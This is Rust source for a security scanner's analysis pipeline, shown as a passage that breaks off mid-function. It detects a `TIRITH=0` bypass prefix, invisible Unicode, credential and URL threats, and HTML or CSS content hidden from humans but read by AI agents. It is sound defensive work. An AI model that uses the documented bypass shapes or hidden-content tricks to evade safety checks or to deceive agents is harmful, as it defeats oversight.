// tirith-core 0.3.0

use std::time::Instant;

use crate::extract::{self, ScanContext};
use crate::normalize;
use crate::policy::Policy;
use crate::tokenize::ShellType;
use crate::verdict::{Finding, Timings, Verdict};

/// Extract the raw path from a URL string before any normalization.
///
/// Returns the text from the first `/` after the `scheme://` separator up to
/// (but not including) the first `?` or `#`. Returns `None` when `raw` has no
/// `://` separator or no path component.
///
/// The query/fragment is cut off *before* the leading slash is searched for,
/// so a `/` that only occurs inside the query or fragment (for example
/// `http://host?next=/admin`) is not mistaken for the start of the path.
fn extract_raw_path_from_url(raw: &str) -> Option<String> {
    let (_, after_scheme) = raw.split_once("://")?;
    // Everything from the first `?` or `#` onward is query/fragment, not path.
    let end = after_scheme
        .find(['?', '#'])
        .unwrap_or(after_scheme.len());
    let authority_and_path = &after_scheme[..end];
    let slash_idx = authority_and_path.find('/')?;
    Some(authority_and_path[slash_idx..].to_string())
}

/// Analysis context passed through the pipeline.
///
/// The analysis entry points take this by shared reference and only read it.
pub struct AnalysisContext {
    /// Text to analyze. Depending on `scan_context` this is handed to the
    /// command/URL rules (Exec, Paste) or to the file-content rules (FileScan).
    pub input: String,
    /// Shell dialect used when tokenizing `input` and when parsing an inline
    /// `TIRITH=0` bypass prefix.
    pub shell: ShellType,
    /// Which kind of scan is being performed; selects the rule families that run.
    pub scan_context: ScanContext,
    /// Raw bytes of the input, when available. Used for the byte-level scans in
    /// Paste and FileScan contexts; FileScan falls back to `input`'s bytes when
    /// this is `None`.
    pub raw_bytes: Option<Vec<u8>>,
    /// Whether the session is interactive. Selects which bypass policy flag
    /// applies (`allow_bypass_env` vs. `allow_bypass_env_noninteractive`).
    pub interactive: bool,
    /// Working directory passed to policy discovery and to the command rules.
    pub cwd: Option<String>,
    /// File path being scanned (only populated for ScanContext::FileScan).
    pub file_path: Option<std::path::PathBuf>,
    /// Only populated for ScanContext::FileScan. When None, configfile checks use
    /// `file_path`'s parent as implicit repo root.
    pub repo_root: Option<String>,
    /// True when `file_path` was explicitly provided by the user as a config file.
    pub is_config_override: bool,
    /// Clipboard HTML content for rich-text paste analysis.
    /// Only populated when `tirith paste --html <path>` is used.
    pub clipboard_html: Option<String>,
}

/// Check if a VAR=VALUE word is `TIRITH=0`, stripping one optional layer of
/// matching surrounding quotes from the value (handles `TIRITH='0'` and
/// `TIRITH="0"`).
///
/// Only a single, matching pair of quotes is removed. Mismatched or nested
/// quoting such as `TIRITH='0"` or `TIRITH="'0'"` is NOT treated as a bypass:
/// a shell would not assign the bare value `0` for those words, so accepting
/// them would grant a bypass the real environment never sees.
fn is_tirith_zero_assignment(word: &str) -> bool {
    let Some((name, raw_val)) = word.split_once('=') else {
        return false;
    };
    if name != "TIRITH" {
        return false;
    }
    // Remove `q ... q` when both ends carry the same quote character.
    let unquote = |q: char| {
        raw_val
            .strip_prefix(q)
            .and_then(|rest| rest.strip_suffix(q))
    };
    let val = unquote('\'').or_else(|| unquote('"')).unwrap_or(raw_val);
    val == "0"
}

/// Check if the input contains an inline `TIRITH=0` bypass prefix.
/// Handles POSIX bare prefix (`TIRITH=0 cmd`), env wrappers (`env -i TIRITH=0 cmd`),
/// PowerShell env syntax (`$env:TIRITH="0"; cmd`), and cmd.exe `set TIRITH=0`.
///
/// Only the words of the first command segment (as produced by
/// `split_raw_words`) are inspected. For POSIX and Fish the whole input must
/// additionally consist of pipe-joined segments with no unquoted `&`;
/// otherwise no bypass is reported.
///
/// Note that the leading-assignment / `env` walk below is not gated on the
/// shell type, so it also runs for PowerShell and cmd.exe input.
///
/// Returns `true` when a bypass prefix is found, `false` otherwise.
fn find_inline_bypass(input: &str, shell: ShellType) -> bool {
    use crate::tokenize;

    if matches!(shell, ShellType::Posix | ShellType::Fish) {
        let segments = tokenize::tokenize(input, shell);
        // The documented bypass shape is `TIRITH=0 <cmd> | <interp>`. Multi-segment
        // pipelines share an env (bypass applies to the whole pipeline), but
        // sequencing operators (`&&`, `||`, `;`, `&`) start independent commands
        // where bypass must NOT carry over.
        if !all_pipe_separated(&segments) || has_unquoted_ampersand(input, shell) {
            return false;
        }
    }

    let words = split_raw_words(input, shell);
    if words.is_empty() {
        return false;
    }

    // POSIX / Fish (Fish 3.1+): leading `VAR=VALUE` assignments, then optionally
    // an `env` wrapper, then the command. Walk past them looking for TIRITH=0.
    let mut idx = 0;
    while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
        if is_tirith_zero_assignment(&words[idx]) {
            return true;
        }
        idx += 1;
    }

    // If the first real word is `env`, parse its flags and assignments.
    if idx < words.len() {
        // Compare on the basename so `/usr/bin/env` matches too; quotes around
        // the command word are ignored.
        let cmd = words[idx].rsplit('/').next().unwrap_or(&words[idx]);
        let cmd = cmd.trim_matches(|c: char| c == '\'' || c == '"');
        if cmd == "env" {
            idx += 1;
            while idx < words.len() {
                let w = &words[idx];
                // `--` ends option parsing; assignments may still follow.
                if w == "--" {
                    idx += 1;
                    break;
                }
                if tokenize::is_env_assignment(w) {
                    if is_tirith_zero_assignment(w) {
                        return true;
                    }
                    idx += 1;
                    continue;
                }
                if w.starts_with('-') {
                    if w.starts_with("--") {
                        // Long flag with a separate value word: skip both.
                        // `--flag=value` carries its value inline: skip one.
                        if env_long_flag_takes_value(w) && !w.contains('=') {
                            idx += 2;
                        } else {
                            idx += 1;
                        }
                        continue;
                    }
                    // Short flags that take a separate value arg.
                    if w == "-u" || w == "-C" || w == "-S" {
                        idx += 2;
                        continue;
                    }
                    idx += 1;
                    continue;
                }
                // Non-flag, non-assignment: this is the command word.
                break;
            }
            // Assignments that follow a `--` terminator. After a command-word
            // break this loop does nothing, because that word is not an assignment.
            while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
                if is_tirith_zero_assignment(&words[idx]) {
                    return true;
                }
                idx += 1;
            }
        }
    }

    // PowerShell: `$env:TIRITH="0"` (single word) or `$env:TIRITH = "0"` (spaced).
    if shell == ShellType::PowerShell {
        for word in &words {
            if is_powershell_tirith_bypass(word) {
                return true;
            }
        }
        if words.len() >= 3 {
            for window in words.windows(3) {
                if is_powershell_env_ref(&window[0], "TIRITH")
                    && window[1] == "="
                    && strip_surrounding_quotes(&window[2]) == "0"
                {
                    return true;
                }
            }
        }
    }

    // cmd.exe: `set TIRITH="0"` stores the literal `"0"` (with quotes), so only
    // bare `TIRITH=0` and whole-token-quoted `"TIRITH=0"` are real bypasses.
    // Inner double quotes and any single quotes must NOT be stripped.
    if shell == ShellType::Cmd && words.len() >= 2 {
        let first = words[0].to_lowercase();
        if first == "set" {
            let second = strip_double_quotes_only(&words[1]);
            if let Some((name, val)) = second.split_once('=') {
                if name == "TIRITH" && val == "0" {
                    return true;
                }
            }
        }
    }

    false
}

/// Whether a long `env` option is one that consumes a value.
///
/// Anything from the first `=` onward is ignored, so both `--chdir` and
/// `--chdir=/tmp` report `true`.
fn env_long_flag_takes_value(flag: &str) -> bool {
    const VALUE_FLAGS: [&str; 3] = ["--unset", "--chdir", "--split-string"];

    let option_name = match flag.find('=') {
        Some(eq_pos) => &flag[..eq_pos],
        None => flag,
    };
    VALUE_FLAGS.contains(&option_name)
}

/// Check whether a single word is a PowerShell `$env:TIRITH=0` assignment.
///
/// The `$env:TIRITH=` part is compared ASCII case-insensitively and the value
/// may be wrapped in one layer of matching single or double quotes.
fn is_powershell_tirith_bypass(word: &str) -> bool {
    const ASSIGN_PREFIX: &str = "$env:TIRITH=";

    // The word needs the whole prefix plus at least one value character.
    if word.len() <= ASSIGN_PREFIX.len() {
        return false;
    }
    // `get` returns None when the cut would land inside a multi-byte character.
    match word.get(..ASSIGN_PREFIX.len()) {
        Some(head) if head.eq_ignore_ascii_case(ASSIGN_PREFIX) => {
            strip_surrounding_quotes(&word[ASSIGN_PREFIX.len()..]) == "0"
        }
        _ => false,
    }
}

/// Check whether `word` is exactly the PowerShell reference `$env:<var_name>`
/// (no assignment attached).
///
/// Both the `env:` scope and the variable name are compared ASCII
/// case-insensitively.
fn is_powershell_env_ref(word: &str, var_name: &str) -> bool {
    let Some(after_sigil) = word.strip_prefix('$') else {
        return false;
    };
    match after_sigil.get(..4) {
        Some(scope) if scope.eq_ignore_ascii_case("env:") => {
            after_sigil[4..].eq_ignore_ascii_case(var_name)
        }
        _ => false,
    }
}

/// Remove one layer of matching quotes (either `"…"` or `'…'`) from `s`.
///
/// Returns `s` unchanged when it is not wrapped in a matching pair.
fn strip_surrounding_quotes(s: &str) -> &str {
    for quote in ['"', '\''] {
        let inner = s
            .strip_prefix(quote)
            .and_then(|rest| rest.strip_suffix(quote));
        if let Some(inner) = inner {
            return inner;
        }
    }
    s
}

/// Remove one layer of surrounding double quotes from `s`, if present.
/// Single quotes are left alone because cmd.exe treats them as literal text.
fn strip_double_quotes_only(s: &str) -> &str {
    s.strip_prefix('"')
        .and_then(|rest| rest.strip_suffix('"'))
        .unwrap_or(s)
}

/// Split the first command of `input` into raw words, respecting quotes
/// (for bypass/self-invocation parsing).
///
/// Unlike `tokenize()`, this does not produce one entry per pipeline segment:
/// it whitespace-splits only the leading segment and stops scanning at the
/// first unquoted `|`, `&`, or newline, at `;` (every shell except cmd.exe),
/// or at `#` (PowerShell only).
///
/// Quote characters and escape sequences are kept verbatim in the returned
/// words; nothing is unescaped or unquoted here.
///
/// Shell-aware escaping: PowerShell uses backtick (`` ` ``), cmd.exe uses
/// caret (`^`), and every other shell uses backslash. Single quotes open a
/// quoted region for every shell except cmd.exe, where they are ordinary
/// characters.
fn split_raw_words(input: &str, shell: ShellType) -> Vec<String> {
    let escape_char = match shell {
        ShellType::PowerShell => '`',
        ShellType::Cmd => '^',
        _ => '\\',
    };

    // Stop at the first unquoted segment boundary — we only care about the
    // first command's words for bypass detection.
    let mut words = Vec::new();
    let mut current = String::new();
    let chars: Vec<char> = input.chars().collect();
    let len = chars.len();
    let mut i = 0;

    while i < len {
        let ch = chars[i];
        match ch {
            ' ' | '\t' if !current.is_empty() => {
                // Move the finished word out instead of cloning it.
                words.push(std::mem::take(&mut current));
                i += 1;
                while i < len && (chars[i] == ' ' || chars[i] == '\t') {
                    i += 1;
                }
            }
            ' ' | '\t' => {
                i += 1;
            }
            // Segment boundaries: only reached outside quotes, because quoted
            // regions and escape pairs are consumed whole by the arms below.
            '|' | '\n' | '&' => break,
            ';' if shell != ShellType::Cmd => break,
            '#' if shell == ShellType::PowerShell => break,
            '\'' if shell != ShellType::Cmd => {
                // Single-quoted region: copied verbatim up to the closing quote
                // (or end of input when unterminated).
                current.push(ch);
                i += 1;
                while i < len && chars[i] != '\'' {
                    current.push(chars[i]);
                    i += 1;
                }
                if i < len {
                    current.push(chars[i]);
                    i += 1;
                }
            }
            '"' => {
                // Double-quoted region: an escape character protects the
                // character that follows it, including a closing quote.
                current.push(ch);
                i += 1;
                while i < len && chars[i] != '"' {
                    if chars[i] == escape_char && i + 1 < len {
                        current.push(chars[i]);
                        current.push(chars[i + 1]);
                        i += 2;
                    } else {
                        current.push(chars[i]);
                        i += 1;
                    }
                }
                if i < len {
                    current.push(chars[i]);
                    i += 1;
                }
            }
            c if c == escape_char && i + 1 < len => {
                // Bare escape: keep both the escape and the escaped character.
                current.push(chars[i]);
                current.push(chars[i + 1]);
                i += 2;
            }
            _ => {
                current.push(ch);
                i += 1;
            }
        }
    }
    if !current.is_empty() {
        words.push(current);
    }
    words
}

/// Report whether every segment after the first is introduced by a pipe
/// operator (`|` or `|&`).
///
/// A single segment (or none) trivially qualifies. This separates the
/// documented `TIRITH=0 cmd | interp` bypass shape from sequencing chains such
/// as `TIRITH=0 cmd && evil`, where the bypass must not reach the second
/// command.
fn all_pipe_separated(segments: &[crate::tokenize::Segment]) -> bool {
    for segment in segments.iter().skip(1) {
        match segment.preceding_separator.as_deref() {
            Some("|") | Some("|&") => {}
            _ => return false,
        }
    }
    true
}

/// Report whether `input` contains an `&` outside quotes and not preceded by
/// the shell's escape character (e.g. the backgrounding operator).
///
/// Escape character: backtick for PowerShell, caret for cmd.exe, backslash
/// otherwise. Single quotes open a quoted region for every shell except
/// cmd.exe.
fn has_unquoted_ampersand(input: &str, shell: ShellType) -> bool {
    let escape = match shell {
        ShellType::PowerShell => '`',
        ShellType::Cmd => '^',
        _ => '\\',
    };
    let single_quotes_quote = shell != ShellType::Cmd;

    let mut rest = input.chars();
    while let Some(ch) = rest.next() {
        if ch == '\'' && single_quotes_quote {
            // Skip through the closing single quote (or to end of input).
            for inner in rest.by_ref() {
                if inner == '\'' {
                    break;
                }
            }
        } else if ch == '"' {
            // Skip through the closing double quote; an escape character
            // swallows the character that follows it.
            while let Some(inner) = rest.next() {
                if inner == '"' {
                    break;
                }
                if inner == escape {
                    rest.next();
                }
            }
        } else if ch == escape {
            // Escaped character outside quotes: never counts as an operator.
            rest.next();
        } else if ch == '&' {
            return true;
        }
    }
    false
}

/// Run the tiered analysis pipeline and return only the verdict.
///
/// The policy loaded during analysis is discarded.
pub fn analyze(ctx: &AnalysisContext) -> Verdict {
    let (verdict, _policy) = analyze_inner(ctx);
    verdict
}

/// Run the tiered analysis pipeline, returning the loaded policy alongside the verdict.
///
/// Use this from enforcement callers (check, gateway, MCP) that need the policy
/// for post-processing — avoids a redundant `Policy::discover()` call.
///
/// The returned policy depends on where the pipeline exits: the tier-1 fast
/// exit and an honored bypass return the result of `Policy::discover_partial`,
/// while a full tier-3 run returns the `Policy::discover` result with user
/// lists, org lists, and trust entries loaded.
pub fn analyze_returning_policy(ctx: &AnalysisContext) -> (Verdict, Policy) {
    analyze_inner(ctx)
}

/// Shared implementation for `analyze()` and `analyze_returning_policy()`.
///
/// The pipeline runs in tiers and records a timing for each one:
///
/// - Tier 0: detect whether a bypass was requested, via the process-level
///   `TIRITH=0` environment variable or (Exec context only) an inline prefix.
/// - Tier 1: cheap trigger scans. If none fires, returns a tier-1 fast allow
///   together with a partially discovered policy.
/// - Tier 2: if a bypass was requested and the policy permits it for the
///   current interactivity mode, returns a tier-2 fast allow and logs the
///   verdict to the audit log. Otherwise loads the full policy, its lists and
///   trust entries, and the cached threat DB.
/// - Tier 3: runs the rule engines for the scan context, then applies custom
///   rules, severity overrides, blocklist findings, allowlist filtering,
///   enrichment, and early-access filtering before building the verdict.
///
/// Returns the verdict and the policy that was loaded along the way.
fn analyze_inner(ctx: &AnalysisContext) -> (Verdict, Policy) {
    let start = Instant::now();

    // Tier 0: record whether a bypass was requested. Whether it is honored is
    // decided in tier 2, after the trigger scans.
    let tier0_start = Instant::now();
    let bypass_env = std::env::var("TIRITH").ok().as_deref() == Some("0");
    // Inline bypass (`TIRITH=0 cmd | sh`) is honored ONLY in Exec context.
    // Paste content is attacker-controllable (clipboard can be crafted) and
    // FileScan has no notion of a typed prefix, so a `TIRITH=0` token in those
    // contexts must not grant bypass. Process-level TIRITH=0 env still applies
    // in every context.
    let bypass_inline =
        ctx.scan_context == ScanContext::Exec && find_inline_bypass(&ctx.input, ctx.shell);
    let bypass_requested = bypass_env || bypass_inline;
    let tier0_ms = tier0_start.elapsed().as_secs_f64() * 1000.0;

    // Tier 1: trigger scans that decide whether the later tiers run at all.
    let tier1_start = Instant::now();

    // Paste-only: byte-level scan catches control chars that never make it
    // into the URL/regex view.
    let byte_scan_triggered = if ctx.scan_context == ScanContext::Paste {
        if let Some(ref bytes) = ctx.raw_bytes {
            let scan = extract::scan_bytes(bytes);
            scan.has_ansi_escapes
                || scan.has_control_chars
                || scan.has_bidi_controls
                || scan.has_zero_width
                || scan.has_invalid_utf8
                || scan.has_unicode_tags
                || scan.has_variation_selectors
                || scan.has_invisible_math_operators
                || scan.has_invisible_whitespace
                || scan.has_hangul_fillers
                || scan.has_confusable_text
        } else {
            false
        }
    } else {
        false
    };

    let regex_triggered = extract::tier1_scan(&ctx.input, ctx.scan_context);

    // Exec-only: catch bidi/zero-width/invisible bytes even when no URL fired.
    // `tirith diff/score/why/receipt/explain` URLs typed by the user are
    // carved out because they're inspection targets — only the eight Unicode-
    // style rule classes filtered at tier 3 are affected by this carveout.
    let inert_range = if ctx.scan_context == ScanContext::Exec {
        extract::tirith_inert_arg_range(&ctx.input, ctx.shell)
    } else {
        None
    };
    let exec_bidi_triggered = if ctx.scan_context == ScanContext::Exec {
        let scan = extract::scan_bytes(ctx.input.as_bytes());
        let scan = match inert_range.as_ref() {
            Some(r) => scan.with_ignored_range(r),
            None => scan,
        };
        scan.has_bidi_controls
            || scan.has_zero_width
            || scan.has_unicode_tags
            || scan.has_variation_selectors
            || scan.has_invisible_math_operators
            || scan.has_invisible_whitespace
            || scan.has_hangul_fillers
            || scan.has_confusable_text
    } else {
        false
    };

    let tier1_ms = tier1_start.elapsed().as_secs_f64() * 1000.0;

    // Fast exit: nothing triggered, so the bypass decision and rule engines
    // are skipped entirely.
    if !byte_scan_triggered && !regex_triggered && !exec_bidi_triggered {
        let total_ms = start.elapsed().as_secs_f64() * 1000.0;
        return (
            Verdict::allow_fast(
                1,
                Timings {
                    tier0_ms,
                    tier1_ms,
                    tier2_ms: None,
                    tier3_ms: None,
                    total_ms,
                },
            ),
            // discover_partial is local-only and cheap; callers still need DLP
            // patterns for audit redaction even on fast-exit.
            Policy::discover_partial(ctx.cwd.as_deref()),
        );
    }

    // Tier 2: bypass decision, then full policy loading.
    let tier2_start = Instant::now();

    if bypass_requested {
        let policy = Policy::discover_partial(ctx.cwd.as_deref());
        // Interactive and non-interactive sessions have separate bypass flags.
        let allow_bypass = if ctx.interactive {
            policy.allow_bypass_env
        } else {
            policy.allow_bypass_env_noninteractive
        };

        if allow_bypass {
            let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
            let total_ms = start.elapsed().as_secs_f64() * 1000.0;
            let mut verdict = Verdict::allow_fast(
                2,
                Timings {
                    tier0_ms,
                    tier1_ms,
                    tier2_ms: Some(tier2_ms),
                    tier3_ms: None,
                    total_ms,
                },
            );
            verdict.bypass_requested = true;
            verdict.bypass_honored = true;
            verdict.interactive_detected = ctx.interactive;
            verdict.policy_path_used = policy.path.clone();
            // An honored bypass is written to the audit log before returning.
            crate::audit::log_verdict(
                &verdict,
                &ctx.input,
                None,
                None,
                &policy.dlp_custom_patterns,
            );
            return (verdict, policy);
        }
    }

    // Bypass not requested or not permitted: load the full policy and lists.
    let mut policy = Policy::discover(ctx.cwd.as_deref());
    policy.load_user_lists();
    policy.load_org_lists(ctx.cwd.as_deref());
    policy.load_trust_entries(ctx.cwd.as_deref());

    // Fail-open: None when the DB is unavailable.
    let threat_db: Option<std::sync::Arc<crate::threatdb::ThreatDb>> =
        crate::threatdb::ThreatDb::cached();

    let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;

    // Tier 3: run the rule engines and collect findings.
    let tier3_start = Instant::now();
    let mut findings = Vec::new();

    // Stays empty for FileScan, which performs no URL extraction.
    let mut extracted = Vec::new();

    if ctx.scan_context == ScanContext::FileScan {
        // FileScan runs byte-scan + configfile/codefile/rendered rules only.
        // It does NOT run command/env/URL-extraction rules — the input isn't a
        // command line, so those rules would produce nonsense findings.
        let byte_input = if let Some(ref bytes) = ctx.raw_bytes {
            bytes.as_slice()
        } else {
            ctx.input.as_bytes()
        };
        let byte_findings = crate::rules::terminal::check_bytes(byte_input);
        findings.extend(byte_findings);

        findings.extend(crate::rules::configfile::check(
            &ctx.input,
            ctx.file_path.as_deref(),
            ctx.repo_root.as_deref().map(std::path::Path::new),
            ctx.is_config_override,
        ));

        if crate::rules::codefile::is_code_file(
            ctx.file_path.as_deref().and_then(|p| p.to_str()),
            &ctx.input,
        ) {
            findings.extend(crate::rules::codefile::check(
                &ctx.input,
                ctx.file_path.as_deref().and_then(|p| p.to_str()),
            ));
        }

        if crate::rules::rendered::is_renderable_file(ctx.file_path.as_deref()) {
            // PDFs need their own parser; everything else is treated as text.
            let is_pdf = ctx
                .file_path
                .as_deref()
                .and_then(|p| p.extension())
                .and_then(|e| e.to_str())
                .map(|e| e.eq_ignore_ascii_case("pdf"))
                .unwrap_or(false);

            if is_pdf {
                let pdf_bytes = ctx.raw_bytes.as_deref().unwrap_or(ctx.input.as_bytes());
                findings.extend(crate::rules::rendered::check_pdf(pdf_bytes));
            } else {
                findings.extend(crate::rules::rendered::check(
                    &ctx.input,
                    ctx.file_path.as_deref(),
                ));
            }
        }
    } else {
        if ctx.scan_context == ScanContext::Paste {
            if let Some(ref bytes) = ctx.raw_bytes {
                let byte_findings = crate::rules::terminal::check_bytes(bytes);
                findings.extend(byte_findings);
            }
            let multiline_findings = crate::rules::terminal::check_hidden_multiline(&ctx.input);
            findings.extend(multiline_findings);

            if let Some(ref html) = ctx.clipboard_html {
                let clipboard_findings =
                    crate::rules::terminal::check_clipboard_html(html, &ctx.input);
                findings.extend(clipboard_findings);
            }
        }

        if ctx.scan_context == ScanContext::Exec {
            let byte_input = ctx.input.as_bytes();
            let scan = extract::scan_bytes(byte_input);
            // Same inert-range carveout as tier-1 so tier-3 findings agree
            // with `exec_bidi_triggered`.
            let scan = match inert_range.as_ref() {
                Some(r) => scan.with_ignored_range(r),
                None => scan,
            };
            if scan.has_bidi_controls
                || scan.has_zero_width
                || scan.has_unicode_tags
                || scan.has_variation_selectors
                || scan.has_invisible_math_operators
                || scan.has_invisible_whitespace
                || scan.has_hangul_fillers
                || scan.has_confusable_text
            {
                // Push the inert range down into check_bytes itself: rules
                // emitting `Evidence::Text` (e.g. UnicodeTags) have no byte
                // offset to post-filter against, so they must be suppressed
                // at scan time.
                let ignore_ranges: &[std::ops::Range<usize>] = inert_range.as_slice();
                let byte_findings =
                    crate::rules::terminal::check_bytes_with_ignore(byte_input, ignore_ranges);
                // Exec context keeps invisible-char findings only — ANSI/control
                // escape rules don't apply to typed commands.
                findings.extend(byte_findings.into_iter().filter(|f| {
                    matches!(
                        f.rule_id,
                        crate::verdict::RuleId::BidiControls
                            | crate::verdict::RuleId::ZeroWidthChars
                            | crate::verdict::RuleId::UnicodeTags
                            | crate::verdict::RuleId::InvisibleMathOperator
                            | crate::verdict::RuleId::VariationSelector
                            | crate::verdict::RuleId::InvisibleWhitespace
                            | crate::verdict::RuleId::HangulFiller
                            | crate::verdict::RuleId::ConfusableText
                    )
                }));
            }
        }

        extracted = extract::extract_urls(&ctx.input, ctx.shell);

        // Per-URL rules: hostname, path, transport, ecosystem.
        for url_info in &extracted {
            // url::Url percent-encodes non-ASCII on parse, so non-ASCII path
            // rules need the raw (pre-parse) path instead.
            let raw_path = extract_raw_path_from_url(&url_info.raw);
            let normalized_path = url_info.parsed.path().map(normalize::normalize_path);

            let hostname_findings = crate::rules::hostname::check(&url_info.parsed, &policy);
            findings.extend(hostname_findings);

            let path_findings = crate::rules::path::check(
                &url_info.parsed,
                normalized_path.as_ref(),
                raw_path.as_deref(),
            );
            findings.extend(path_findings);

            let transport_findings =
                crate::rules::transport::check(&url_info.parsed, url_info.in_sink_context);
            findings.extend(transport_findings);

            let ecosystem_findings = crate::rules::ecosystem::check(&url_info.parsed);
            findings.extend(ecosystem_findings);
        }

        // Threat intel rules are a local DB lookup — no network I/O on the hot path.
        let threat_findings = crate::rules::threatintel::check(
            &ctx.input,
            ctx.shell,
            &extracted,
            threat_db.as_deref(),
        );
        findings.extend(threat_findings);

        let command_findings = crate::rules::command::check(
            &ctx.input,
            ctx.shell,
            ctx.cwd.as_deref(),
            ctx.scan_context,
        );
        findings.extend(command_findings);

        let cred_findings =
            crate::rules::credential::check(&ctx.input, ctx.shell, ctx.scan_context);
        findings.extend(cred_findings);

        let env_findings = crate::rules::environment::check(&crate::rules::environment::RealEnv);
        findings.extend(env_findings);

        // Network policy is only evaluated when a deny list is configured.
        if !policy.network_deny.is_empty() {
            let net_findings = crate::rules::command::check_network_policy(
                &ctx.input,
                ctx.shell,
                &policy.network_deny,
                &policy.network_allow,
            );
            findings.extend(net_findings);
        }
    }

    // Custom rules run in every scan context, including FileScan.
    if !policy.custom_rules.is_empty() {
        let compiled = crate::rules::custom::compile_rules(&policy.custom_rules);
        let custom_findings = crate::rules::custom::check(&ctx.input, ctx.scan_context, &compiled);
        findings.extend(custom_findings);
    }

    // Policy severity overrides apply to the findings collected so far; the
    // blocklist findings pushed below are added afterwards.
    for finding in &mut findings {
        if let Some(override_sev) = policy.severity_override(&finding.rule_id) {
            finding.severity = override_sev;
        }
    }

    // A blocklist hit on any extracted URL yields a fresh Critical finding so
    // the final verdict escalates to Block regardless of other rules.
    for url_info in &extracted {
        if policy.is_blocklisted(&url_info.raw) {
            findings.push(Finding {
                rule_id: crate::verdict::RuleId::PolicyBlocklisted,
                severity: crate::verdict::Severity::Critical,
                title: "URL matches blocklist".to_string(),
                description: format!("URL '{}' matches a blocklist pattern", url_info.raw),
                evidence: vec![crate::verdict::Evidence::Url {
                    raw: url_info.raw.clone(),
                }],
                human_view: None,
                agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
            });
        }
    }

    // Allowlist drops findings whose URLs are allowlisted, but blocklist wins
    // when both match: blocklisted URLs keep their findings.
    if !policy.allowlist.is_empty() || !policy.allowlist_rules.is_empty() {
        let blocklisted_urls: Vec<&str> = extracted
            .iter()
            .filter(|u| policy.is_blocklisted(&u.raw))
            .map(|u| u.raw.as_str())
            .collect();

        findings.retain(|f| {
            let urls_in_evidence: Vec<&str> = f
                .evidence
                .iter()
                .filter_map(|e| match e {
                    crate::verdict::Evidence::Url { raw } => Some(raw.as_str()),
                    _ => None,
                })
                .collect();

            // Findings without URL evidence are never affected by the allowlist.
            if urls_in_evidence.is_empty() {
                return true;
            }

            // Per-rule allowlisting matches on the built-in rule id or, for
            // custom rules, on the custom rule id.
            let rule_allowlisted = |url: &str| {
                policy.is_allowlisted_for_rule(&f.rule_id.to_string(), url)
                    || f.custom_rule_id.as_deref().is_some_and(|custom_rule_id| {
                        policy.is_allowlisted_for_rule(custom_rule_id, url)
                    })
            };

            // Keep when any referenced URL is blocklisted; otherwise drop only
            // if every referenced URL is allowlisted for this finding.
            urls_in_evidence
                .iter()
                .any(|url| blocklisted_urls.contains(url))
                || !urls_in_evidence
                    .iter()
                    .all(|url| policy.is_allowlisted(url) || rule_allowlisted(url))
        });
    }

    enrich_pro(&mut findings);
    enrich_team(&mut findings);

    crate::rule_metadata::filter_early_access(&mut findings, crate::license::Tier::Enterprise);

    let tier3_ms = tier3_start.elapsed().as_secs_f64() * 1000.0;
    let total_ms = start.elapsed().as_secs_f64() * 1000.0;

    let mut verdict = Verdict::from_findings(
        findings,
        3,
        Timings {
            tier0_ms,
            tier1_ms,
            tier2_ms: Some(tier2_ms),
            tier3_ms: Some(tier3_ms),
            total_ms,
        },
    );
    // Reaching this point means any requested bypass was not honored; report
    // the request and whether the policy would have allowed one.
    verdict.bypass_requested = bypass_requested;
    verdict.bypass_available = if ctx.interactive {
        policy.allow_bypass_env
    } else {
        policy.allow_bypass_env_noninteractive
    };
    verdict.interactive_detected = ctx.interactive;
    verdict.policy_path_used = policy.path.clone();
    verdict.urls_extracted_count = Some(extracted.len());

    (verdict, policy)
}

/// Drop findings below the visibility threshold for `paranoia`, then recompute
/// the verdict's action from what remains.
///
/// This is an output-layer filter: the engine itself always detects
/// everything, and CLI/MCP callers apply this after `analyze()` to cut noise
/// at lower paranoia levels.
///
/// - Paranoia 1-2: Medium+ findings only
/// - Paranoia 3: also show Low findings
/// - Paranoia 4: also show Info findings
pub fn filter_findings_by_paranoia(verdict: &mut Verdict, paranoia: u8) {
    retain_by_paranoia(&mut verdict.findings, paranoia);
    let action = recalculate_action(&verdict.findings);
    verdict.action = action;
}

/// Filter a Vec<Finding> by paranoia level.
/// Same logic as `filter_findings_by_paranoia` but operates on raw findings.
///
/// Findings are removed in place. No action is recalculated here because
/// there is no verdict to update.
pub fn filter_findings_by_paranoia_vec(findings: &mut Vec<Finding>, paranoia: u8) {
    retain_by_paranoia(findings, paranoia);
}

/// Derive the verdict action from the highest severity among `findings`
/// (same logic as `Verdict::from_findings`).
///
/// No findings, or only Info findings, yields `Allow`; Low or Medium yields
/// `Warn`; High or Critical yields `Block`.
fn recalculate_action(findings: &[Finding]) -> crate::verdict::Action {
    use crate::verdict::{Action, Severity};

    let worst = findings.iter().map(|finding| finding.severity).max();
    match worst {
        None => Action::Allow,
        Some(Severity::Critical | Severity::High) => Action::Block,
        Some(Severity::Medium | Severity::Low) => Action::Warn,
        Some(Severity::Info) => Action::Allow,
    }
}

/// Shared paranoia retention logic.
fn retain_by_paranoia(findings: &mut Vec<Finding>, paranoia: u8) {
    let effective = paranoia.min(4);

    findings.retain(|f| match f.severity {
        crate::verdict::Severity::Info => effective >= 4,
        crate::verdict::Severity::Low => effective >= 3,
        _ => true,
    });
}

/// Pro enrichment: dual-view, decoded content, cloaking diffs, line numbers.
fn enrich_pro(findings: &mut [Finding]) {
    for finding in findings.iter_mut() {
        match finding.rule_id {
            // Rendered-content findings carry a dual view: what the human sees
            // vs. what the AI agent processes.
            crate::verdict::RuleId::HiddenCssContent => {
                finding.human_view =
                    Some("Content hidden via CSS — invisible in rendered view".into());
                finding.agent_view = Some(format!(
                    "AI agent sees full text including CSS-hidden content. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::HiddenColorContent => {
                finding.human_view =
                    Some("Text blends with background — invisible to human eye".into());
                finding.agent_view = Some(format!(
                    "AI agent reads text regardless of color contrast. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::HiddenHtmlAttribute => {
                finding.human_view =
                    Some("Elements marked hidden/aria-hidden — not displayed".into());
                finding.agent_view = Some(format!(
                    "AI agent processes hidden element content. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::HtmlComment => {
                finding.human_view = Some("HTML comments not rendered in browser".into());
                finding.agent_view = Some(format!(
